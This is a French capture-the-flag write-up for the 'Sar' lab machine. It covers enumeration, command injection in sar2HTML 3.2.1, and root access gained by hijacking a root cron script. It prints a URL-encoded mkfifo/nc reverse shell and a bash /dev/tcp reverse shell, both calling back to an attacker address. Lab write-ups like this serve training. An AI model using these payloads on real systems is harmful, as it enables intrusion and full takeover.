# Sar

`sar2HTML` `cronjob`

* Nom machine : Sar
* Difficulté : Easy
* OS : Linux

## Enumération

### NMAP

```
Nmap scan report for 192.168.228.35
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 33:40:be:13:cf:51:7d:d6:a5:9c:64:c8:13:e5:f2:9f (RSA)
|   256 8a:4e:ab:0b:de:e3:69:40:50:98:98:58:32:8f:71:9e (ECDSA)
|_  256 e6:2f:55:1c:db:d0:bb:46:92:80:dd:5f:8e:a3:0a:41 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP (80)

```
┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.228.35/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.228.35/__24-08-26_09-49-52.txt

Target: http://192.168.228.35/

[09:49:52] Starting: 
[09:49:55] 403 -  279B  - /.ht_wsr.txt
[09:49:55] 403 -  279B  - /.htaccess.orig
[09:49:55] 403 -  279B  - /.htaccess.sample
[09:49:55] 403 -  279B  - /.htaccess.save
[09:49:55] 403 -  279B  - /.htaccess_extra
[09:49:55] 403 -  279B  - /.htaccess_orig
[09:49:55] 403 -  279B  - /.htaccess_sc
[09:49:55] 403 -  279B  - /.htaccessBAK
[09:49:55] 403 -  279B  - /.htaccessOLD
[09:49:55] 403 -  279B  - /.htaccessOLD2
[09:49:55] 403 -  279B  - /.htm
[09:49:55] 403 -  279B  - /.html
[09:49:55] 403 -  279B  - /.htpasswd_test
[09:49:55] 403 -  279B  - /.htpasswds
[09:49:55] 403 -  279B  - /.httr-oauth
[09:49:56] 403 -  279B  - /.htaccess.bak1
[09:49:56] 403 -  279B  - /.php
[09:50:20] 200 -   24KB - /phpinfo.php
[09:50:23] 200 -    9B  - /robots.txt
[09:50:23] 403 -  279B  - /server-status/
[09:50:23] 403 -  279B  - /server-status

Task Completed
```

robots.txt : sar2HTML

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FdW1dY9Wk3QAsB8rxtjME%2F739403d7922dd4dc922047a4ec1ea2b0.png?alt=media&#x26;token=72fd76c3-b89f-4d62-905a-f5f1f36fcc2b" alt=""><figcaption></figcaption></figure>

verison : 3.2.1

## Accès initial

{% embed url="<https://www.exploit-db.com/exploits/47204>" %}

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FAa3moJPU9sKdosOEkjHD%2F17a5a0368c6615a252f2773bc6e8fb71.png?alt=media&#x26;token=1f6a3205-0c68-450b-a9a2-684c383203da" alt=""><figcaption></figcaption></figure>

Nous allons injecter le payload nc mkfifo avec encodage URL sur le port 1234.

```
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.224%201234%20%3E%2Ftmp%2Ff
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.228.35] 38454
bash: cannot set terminal process group (1018): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sar:/var/www/html/sar2HTML$ ls
```

## elévation des privilèges

```
www-data@sar:/home/love$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh
```

```
www-data@sar:/var/www/html$ cat finally.sh
#!/bin/sh

./write.sh

www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/sh

touch /tmp/gateway
```

Nous avons tous les droits sur write.sh (nous pouvons aussi supprimer et ajouter des fichiers dans ce dossier).

```
www-data@sar:/var/www/html$ echo "/bin/bash -i >& /dev/tcp/192.168.45.224/1235 0>&1" > write.sh
```

Plus qu'à se faire un café et attendre 5 minutes.

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1235
listening on [any] 1235 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.228.35] 44676
bash: cannot set terminal process group (2568): Inappropriate ioctl for device
bash: no job control in this shell
root@sar:/var/www/html# whoami
root
```